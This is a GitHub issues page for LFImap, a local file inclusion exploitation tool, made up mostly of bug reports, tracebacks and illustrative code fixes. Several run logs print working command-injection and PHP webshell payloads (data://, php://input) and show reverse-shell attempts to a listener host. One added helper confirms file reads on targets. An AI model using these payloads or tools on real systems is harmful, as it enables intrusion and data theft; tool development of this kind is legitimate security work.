hansmach1ne / lfimap
Local File Inclusion discovery and exploitation tool
License: Apache License 2.0
└─# python3.9 lfimap.py --all -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Preparing to test misc issues using heuristics...
[.] Testing for XSS...
[.] Testing for CRLF...
[.] Testing for error-based info leak...
[.] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
Traceback (most recent call last):
  File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in <module>
    main()
  File "/WhiteyCookie/Github/LFImap/lfimap.py", line 111, in main
    test_input(url, "")
  File "/WhiteyCookie/Github/LFImap/src/attacks/input.py", line 16, in test_input
    if(args.is_tested_param_post):
AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'
The issue is that /etc/passwd might be blocked by a WAF, so try to include a modality that will use 'silent' payloads and include different files to confirm the vulnerability.
Also, Java tends to not allow path traversal outside the web root, so implement something like /WEB-INF/web.xml or a similar method of discovery...
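A worked example of the "confirm with different files" idea from the request above, added here as illustration and not part of LFImap: it checks a response body for signatures of several well-known files and also recognises content that came back base64-encoded through php://filter. The candidate file list, the regexes and the sample responses are this example's own assumptions and constructed data.

```python
import base64
import binascii
import re

# Files to request once the traversal/wrapper is in place, with a regex that
# proves the real file content came back.  The signatures are the well-known
# contents of these files; which files a given WAF blocks is an assumption,
# so the caller tries the whole list instead of stopping at /etc/passwd.
LFI_SIGNATURES = {
    "/etc/hosts": re.compile(r"^127\.0\.0\.1\s+localhost", re.M),
    "/etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "/WEB-INF/web.xml": re.compile(r"<web-app[\s>]"),        # Java: inside the web root
    "C:/Windows/win.ini": re.compile(r"^\[fonts\]", re.M | re.I),
}

# Base64 runs long enough to hold a file fragment (php://filter/convert.base64-encode).
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def confirm_file(path, body):
    """Return 'plain' or 'base64' if `body` contains `path`'s content, else None."""
    sig = LFI_SIGNATURES[path]
    if sig.search(body):
        return "plain"
    for blob in _B64_RUN.findall(body):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue                                # not a valid base64 run
        if sig.search(text):
            return "base64"
    return None


def confirm_any(responses):
    """responses: {path: response body}. Returns {path: evidence} for confirmed files."""
    found = {}
    for path, body in responses.items():
        if path in LFI_SIGNATURES:
            evidence = confirm_file(path, body)
            if evidence:
                found[path] = evidence
    return found


# Constructed responses standing in for what a target would return.
SAMPLE_RESPONSES = {
    "/etc/passwd": "<html><body><h1>403 Forbidden</h1></body></html>",   # WAF blocks it
    "/etc/hosts": "<pre>\n127.0.0.1\tlocalhost\n::1\tlocalhost\n</pre>",
    "/WEB-INF/web.xml": '<?xml version="1.0"?><web-app xmlns="http://java.sun.com/xml/ns/javaee"></web-app>',
}
# Constructed: what a php://filter/convert.base64-encode/resource=/etc/passwd response looks like.
SAMPLE_FILTER_RESPONSE = "<div>" + base64.b64encode(
    b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin:/usr/sbin/nologin\n"
).decode() + "</div>"

if __name__ == "__main__":
    print(confirm_any(SAMPLE_RESPONSES))
    print(confirm_file("/etc/passwd", SAMPLE_FILTER_RESPONSE))
```

Order the candidate list so the files least likely to trip a signature-based WAF come first; a single confirmed file is enough to report the inclusion, and the decode path means a php://filter hit is not missed just because the raw bytes never appear in the page.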
Implement automatic token refresh for requests.
There is a lack of timeouts in the requests calls; I have added them in a PR: #67
└─# python3.9 lfimap.py --t -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt --use-long -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Testing path truncation using '/WhiteyCookie/Github/LFImap/src/wordlists/long.txt' wordlist...
Traceback (most recent call last):
  File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in <module>
    main()
  File "/WhiteyCookie/Github/LFImap/lfimap.py", line 164, in main
    print(colors.red("[-]") + " GET parameter '" + get_params_with_param(url, args.param) + "' doesn't seem to be vulnerable.\n")
TypeError: get_params_with_param() takes 1 positional argument but 2 were given
Create easy pip install module.
whoami :)
└─$ python3
Python 3.11.6 (main, Oct 8 2023, 05:06:43) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from lfimap import main
>>> main()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 264, in main
    if args['param'] in config.url:
                        ^^^^^^^^^^
AttributeError: module 'src.configs.config' has no attribute 'url'. Did you mean: 'urls'?
Issue background:
When running python3 lfimap.py -h, the interpreter looks for if(__name__ == "__main__") and enters this block; however, once the program is imported as a module and main() is called (like a pip configuration does/requires), it will error out, because checkArgs is not called at all in that case:
    # Check command-line arguments
    if not checkArgs():
        sys.exit(-1)
lfimap.py: error: unrecognized arguments: --url http://testphp.vulnweb.com/showimage.php?file=PWN
There seems to be a circular dependency in the code that makes it impossible to load a module directly without the "main.py" code.
This makes writing tests (pytest) impossible and probably also affects the stability of the code (debugging fails to properly jump to the right place due to this); the circular dependency can be seen in:
from src.attacks.pwn import pwn
src/attacks/pwn.py:2: in <module>
    from src.attacks.bash import exploit_bash
src/attacks/bash.py:1: in <module>
    from src.httpreqs import request
src/httpreqs/request.py:5: in <module>
    from src.attacks.pwn import pwn
E   ImportError: cannot import name 'pwn' from partially initialized module 'src.attacks.pwn' (most likely due to a circular import) (src/LFImap/src/attacks/pwn.py)
It's not limited to the pwn module importing, but rather to anything that imports pwn in some code flow.
I think it is a good idea to perform code cleanup so that this doesn't happen.
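To make the cycle and a fix concrete, here is an added example (not LFImap's code) that builds three in-memory modules with the same import edges the traceback shows, pwn -> bash -> request -> pwn, reproduces the ImportError, and then shows the usual fix: request imports pwn inside the function that needs it instead of at module load. Module names, function bodies and the dict-backed finder are constructed for this example.

```python
import importlib
import importlib.abc
import importlib.util
import sys
import textwrap

# Module sources are constructed for this example.  They reproduce only the
# import edges named in the traceback (pwn -> bash -> request -> pwn); the
# function bodies are stand-ins, not LFImap's code.
CYCLIC = {
    "cyc_pwn": """
        from cyc_bash import exploit_bash          # pwn -> bash
        def pwn(target):
            return exploit_bash(target)
    """,
    "cyc_bash": """
        from cyc_request import REQUEST            # bash -> request
        def exploit_bash(target):
            return REQUEST(target, exploit=True)
    """,
    "cyc_request": """
        from cyc_pwn import pwn                    # request -> pwn closes the cycle
        def REQUEST(target, exploit=False):
            if exploit:
                return "exploit request sent to " + target
            return pwn(target)                     # vulnerability confirmed -> exploit
    """,
}

# Same graph, but request no longer imports pwn at module load: the import is
# deferred to call time, when every module is fully initialised.
FIXED = {
    "fixed_pwn": CYCLIC["cyc_pwn"].replace("cyc_", "fixed_"),
    "fixed_bash": CYCLIC["cyc_bash"].replace("cyc_", "fixed_"),
    "fixed_request": """
        def REQUEST(target, exploit=False):
            if exploit:
                return "exploit request sent to " + target
            from fixed_pwn import pwn              # deferred import breaks the cycle
            return pwn(target)
    """,
}


class SourceDictFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    """Lets `import name` resolve to source text held in a dict (no files needed)."""

    def __init__(self, sources):
        self.sources = sources

    def find_spec(self, fullname, path=None, target=None):
        if fullname in self.sources:
            return importlib.util.spec_from_loader(fullname, self)
        return None

    def create_module(self, spec):
        return None                                # use the default module object

    def exec_module(self, module):
        exec(textwrap.dedent(self.sources[module.__name__]), module.__dict__)


sys.meta_path.insert(0, SourceDictFinder({**CYCLIC, **FIXED}))


def import_cyclic():
    """Import the cyclic graph; returns the ImportError text (None if it imported)."""
    for name in CYCLIC:
        sys.modules.pop(name, None)
    try:
        importlib.import_module("cyc_pwn")
    except ImportError as exc:
        return str(exc)
    return None


def run_fixed(target):
    """Import the fixed graph and drive it from both ends of the former cycle."""
    for name in FIXED:
        sys.modules.pop(name, None)
    pwn_mod = importlib.import_module("fixed_pwn")
    request_mod = importlib.import_module("fixed_request")
    return pwn_mod.pwn(target), request_mod.REQUEST(target)


if __name__ == "__main__":
    print("cyclic:", import_cyclic())
    print("fixed:", run_fixed("10.0.0.1"))
```

The deferred import is the smallest change; the cleaner long-term fix is the one the issue asks for, moving the "found a vulnerability, now exploit it" dispatch out of the request layer so that request.py has no reason to know about pwn at all.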
The code currently is written with somewhat weird tabbing / missing string concatenation, ' instead of "; may I recommend using black to make it look more readable?
Here is a PR that will show you the difference (I just ran 'black' on the root folder): #53
The rfi.py refers to these URLs:
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.php"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.jsp"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.html"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.gif"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.png"
)
Which, decoded, results in:
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.php"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.jsp"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.html"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.gif"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.png"
)
None of these URLs exist :(
Is this intentional? looks like a mishap
Hello, thank you for your project, it seems very promising.
I get the following error while trying to run it.
C:\tools\LFImap>python lfimap.py -U "http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php" -C "asdasd" -a
Traceback (most recent call last):
  File "C:\tools\LFImap\lfimap.py", line 1799, in <module>
    main()
  File "C:\tools\LFImap\lfimap.py", line 1442, in main
    r,_ = REQUEST(url, headers, postTest, proxies, "test", "test")
  File "C:\tools\LFImap\lfimap.py", line 255, in REQUEST
    if(tOut is not None): res = requests.request(args.method, url, data=postData.encode("utf-8"), headers=headersData, proxies=proxy, verify=False, timeout=tOut)
  File "C:\Python310\lib\site-packages\requests\api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 562, in request
    method=method.upper(),
AttributeError: 'NoneType' object has no attribute 'upper'
I am using Python 3.10.6.
Any idea?
└─$ python3 lfimap.py -U "http://10.10.200.85/vulnerabilities/exec/#" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost 10.8.164.25 --lport 99 -x
[i] Testing form-line 'ip' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> 'http://10.10.200.85/vulnerabilities/exec/#' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[.] Trying to pop reverse shell to 10.8.164.25:99 using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 477, in <module>
    main()
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 404, in main
    test_cmd_injection(url, post)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/cmdi.py", line 54, in test_cmd_injection
    r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 221, in REQUEST
    if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 106, in init
    pwn(exploit)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/pwn.py", line 72, in pwn
    exploit_bash(exploit, "CMD", ip, port)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/bash.py", line 79, in exploit_bash
    request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'
Ability to detect second order LFI/LFR, stored xss
Hi, I am trying to save the output of the script, for example like this:
python3 LFImap/lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "..." -a > fi.txt
Or by using subprocess.Popen and then using iter to get the output, but it does not print anything.
Also tried with subprocess.run and capture_output, and printing it at the end... Still nothing.
Am I doing something wrong?
└─$ python3 lfimap.py -U "https://mach1ne.org/a/PWN"
[-] Something unexpected has happened, initial testing response is not clearly received. Please check your switches and url endpoint(s). Exiting...
Problematic if the user wants to test, for example, a specific part of the request that contains binary data.
Can we use this default .gitignore file? https://github.com/github/gitignore/blob/main/Python.gitignore
It will help git ignore venv/ and __pycache__ and similar.
At the moment the constant calling to:
    from src.utils.arguments import args
is causing the code to have complexity that makes it impossible to:
- args is accessed as it doesn't know which arguments exist/don't exist
- args = parser.parse_args() code is called and parameters are init
I suggest moving the arguments.py code so that it is not all sitting in the 'global' but rather inside a class, initialised once when the code starts, which stores the variables inside a dict rather than args, or inside self values of this class; pass this newly created class around to whoever needs it, or still use it as a global (but prevent its init from being called on every import).
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=aa#" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost 192.168.56.113 --lport 99 -r -P "127.0.0.1:8080" -d -heur
[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=mns%3A817%3Ew%3Cgf%3B93%22%27rq' -> full reflection in response
Content-Type: text/html;charset=utf-8
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8%2B&c=cat%20%2Fetc%2Fpasswd'
----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2
Add support for endpoints that use JSON as the Content-Type.
This is partially supported now, by using placeholder PWN as the injection point, however parameters won't be parsed and tested 1 by 1 automatically.
Tried to initiate a reverse shell and this is the output i get:
python3 lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "PHPSESSID=pee4sgbjm74s57o43h39vevqo0; security=low" -a --lhost 192.168.65.3 --lport 3001 -x -v
[i] Testing GET 'page' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[+] LFI -> 'http://localhost/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd'
[i] Testing with input wrapper...
[+] RCE -> 'http://localhost/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 769, in <module>
    main()
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 642, in main
    test_input(url, post)
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/attacks/input.py", line 57, in test_input
    _, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 359, in REQUEST
    if init(res, "", exploitType, url, postData, headersData, exploitMethod):
  File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 148, in init
    pwn(exploit)
NameError: name 'pwn' is not defined
pwn() is not called when '-t' module finds the vulnerability
Implement ability to RCE with reverse shell for all attack techniques in case of a true positive
Not clear how to use long.txt wordlist instead of short.txt, can you add it to instructions?
Also need some bypass techniques for waf like urlencode
Suggestion from @nrathaus.
The args.method is undefined if -M is not specified and the placeholder (--placeholder, args.param) is not part of the URL. This causes the application to crash.
The issue lies in the following lines: Lines 1623 to 1632 in 436ea01
One possible solution would be setting a default method in the optionsGroup.add_argument call or rewriting the code in this fashion:
if (args.url and args.param in args.url): args.method = "GET"
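An added example (not LFImap's code) of the suggestions made in the issues above: parse the arguments once into an options object that is passed around instead of a module-level args global (so the entry point is safe to import and call, unlike the main() described earlier), always carry a request timeout, and derive args.method from where the placeholder appears instead of leaving it None. The flag names mirror the ones seen in this thread, but the parser, the GET/POST-only choice, the default timeout and the placeholder inference rule are assumptions of this example.

```python
import argparse
import sys


class Options:
    """All run-time settings, parsed once and passed explicitly instead of a
    module-level `args` global that is re-created on every import."""

    def __init__(self, ns):
        self.url = ns.url
        self.data = ns.data                       # POST body, or None
        self.placeholder = ns.placeholder         # injection marker, "PWN" by default
        self.timeout = ns.timeout                 # every request gets this (assumed default)
        self.headers = {"Cookie": ns.cookie} if ns.cookie else {}
        # -M wins; otherwise infer from where the placeholder sits, never leave it None.
        self.method = ns.method or self._infer_method()

    def _infer_method(self):
        if self.placeholder in self.url:
            return "GET"
        if self.data and self.placeholder in self.data:
            return "POST"
        raise ValueError(
            f"placeholder {self.placeholder!r} not found in URL or POST data; "
            "pass -M explicitly or mark the injection point"
        )

    def request_kwargs(self):
        """Keyword arguments for requests.request(); the timeout is always set."""
        kw = {"method": self.method, "url": self.url,
              "headers": self.headers, "timeout": self.timeout}
        if self.data is not None:
            kw["data"] = self.data
        return kw


def build_parser():
    # Flag names follow the ones used in this thread; the option set is this example's.
    p = argparse.ArgumentParser(prog="lfimap-options-example")
    p.add_argument("-U", "--url", required=True)
    p.add_argument("-D", "--data", help="POST body")
    p.add_argument("-C", "--cookie")
    p.add_argument("-M", "--method", choices=["GET", "POST"])   # no default on purpose
    p.add_argument("--placeholder", default="PWN")
    p.add_argument("--timeout", type=float, default=10.0)
    return p


def parse_options(argv):
    """argv is a list like sys.argv[1:]; nothing is parsed at import time."""
    return Options(build_parser().parse_args(argv))


def main(argv=None):
    opts = parse_options(sys.argv[1:] if argv is None else argv)
    print(opts.request_kwargs())                  # e.g. requests.request(**opts.request_kwargs())
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Because parse_options() only runs when called, `from lfimap import main; main([...])` works the same as the command line, pytest can build an Options object directly, and a missing injection point fails with a clear ValueError instead of the `'NoneType' object has no attribute 'upper'` crash seen earlier in this thread.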